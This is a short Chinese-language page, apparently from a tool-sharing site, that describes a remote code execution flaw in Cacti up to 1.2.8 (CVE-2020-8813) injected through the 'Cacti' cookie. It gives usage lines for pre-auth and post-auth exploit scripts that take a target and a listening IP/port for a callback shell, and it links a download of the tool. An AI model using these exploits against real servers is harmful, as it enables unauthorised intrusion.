Cacti v1.2.8 RCE(CVE-2020-8813)

## 漏洞概述

漏洞点在登录的`Cookie`变量`Cacti`的值,将其改为系统命令造成RCE;

但是操作Cookie值会遇到身份验证问题,因此需开启访客页面,配合利用。

## 影响范围

“`http
Cacti <= 1.28 ``` ## POC 暂无。编写nuclei的poc!!! ## EXP **Pre-Auth RCE** 前提:开启来宾实时图查看权限 graph_realtime.php?action=init 中包含poller_realtime.php ``` python Cacti-preauth-rce.py x.x.x.x ListeningIP ListeningPORT(VPS监听) ``` **Post-Auth RCE** 前提:已知一个账户 ``` python Cacti-postauth-rce.py x.x.x.x admin pass ListeningIP ListeningPORT ``` ## 参考链接 https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ ## 下载 [点我下载](/Gr33kLibrary/download_tool/59/)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容